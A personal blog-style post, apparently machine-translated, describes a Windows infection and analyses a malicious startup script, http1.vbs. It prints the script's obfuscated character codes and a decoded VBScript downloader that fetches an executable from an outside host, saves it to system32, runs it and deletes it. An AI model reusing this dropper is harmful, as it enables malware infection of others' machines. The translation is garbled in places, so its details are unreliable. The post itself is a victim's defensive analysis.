Today, I accidentally found my computer poisoned. Every time I start the system, I found that my administrator account was not displayed at startup, and two inexplicable administrator accounts were created. It was very depressing. I checked the startup Item (msconfig) found. Several suspicious startup items are added, and c: \ windows \ system32 \
Http1.vbs open a file like this Code : (101,116, 111,115,116, 114,101, 97,116,101, 106,101, 99,116, 77,115,120,109,108, 101,116, 104,101,108,108, 114,101, 97,116,101, 106,101, 99,116, 87,115, 99,114,105,112,116, 104,101,108,108, 80,111,115,116, 112,101,110, 104,116,116,112, 47,108,101, 111,114,103, 46,101,120,101, 111,115,116, 101,110,100, 83,101,116, 71,101,116, 114,101, 97,116,101, 106,101, 99,116, 83,116,114,101, 97,109, 101,116, 111,100,101, 101,116, 121,112,101, 101,116, 112,101,110, 41, 71,101,116, 114,105,116,101, 111,115,116, 46,114,101,115,112,111,110,115,101, 66,111,100,121, 71,101,116, 97,118,101, 84,111, 70,105,108,101, 92,119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 50, 92,-13891,-15152,-101,120,101,-18462,49, 10,119,115, 99,114,105,112,116, 46,115,108,101,101,112, 48, 48, 48, 83,104,101,108,108, 117,110, 119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 13891, 15152, 101,120,101, 119,115, 99,114,105,112,116, 46,115,108,101,101,112, 115,101,116, 32,102,115,111, 114,101, 97,116,101,111, 98,106,101, 99,116, 114,105,112,116,105,110,103, 46,102,105,108,101,115,121,115,116,101,109,111, 98,106,101, 99,116, 102,115,111, 101,108,101,116,101, 70,105,108,101, 119,105,110,100,111,119,115, 92,115,121,115,116,101,109, 20058, 13891, 15152, 92,-18462,49, 101,120,101)
I did not understand it. First, I deleted the startup item. I found that the restart was still unavailable. I opened the Registry (Regedit) and searched for the startup Item to delete the Registry. Then I opened http1.vbs and found that C #ProgramRe-compile the code to output the content of the excute: Runner
Set post = Createobject ("msxml2.xmlhttp ")
Set shell = Createobject ("wscript. Shell ")
Post. Open "get", "http://le19.3322.org/2.exe", 0
Post. Send ()
Set aget = Createobject ("ADODB. Stream ")
Aget. mode = 3
Aget. type = 1
Aget. open ()
Aget. Write (post. responsebody)
Aget. savetofile "C: \ windows \ system32 \ zookeeper without 1433.exe", 2
Wscript. Sleep 20000
Shell. Run ("C: \ windows \ system32 \ zookeeper without 1433.exe ")
Wscript. Sleep 10000
Set FSO = Createobject ("scripting. FileSystemObject ")
FSO. deletefile ("C: \ windows \ system32 \ 놦즽럢럢1433.exe ")
In this way, we can clearly understand what the vbs is trying to do. I hope this is effective after all the parts are deleted. The problem is that the virus file was executed in part 1433.exe. I hope it will not have a big impact on my computer.
Summary: The method of virus poisoning is to browse the website, load and execute virus files, download vbs files, add startup items, add the registry, execute virus files, and delete virus files.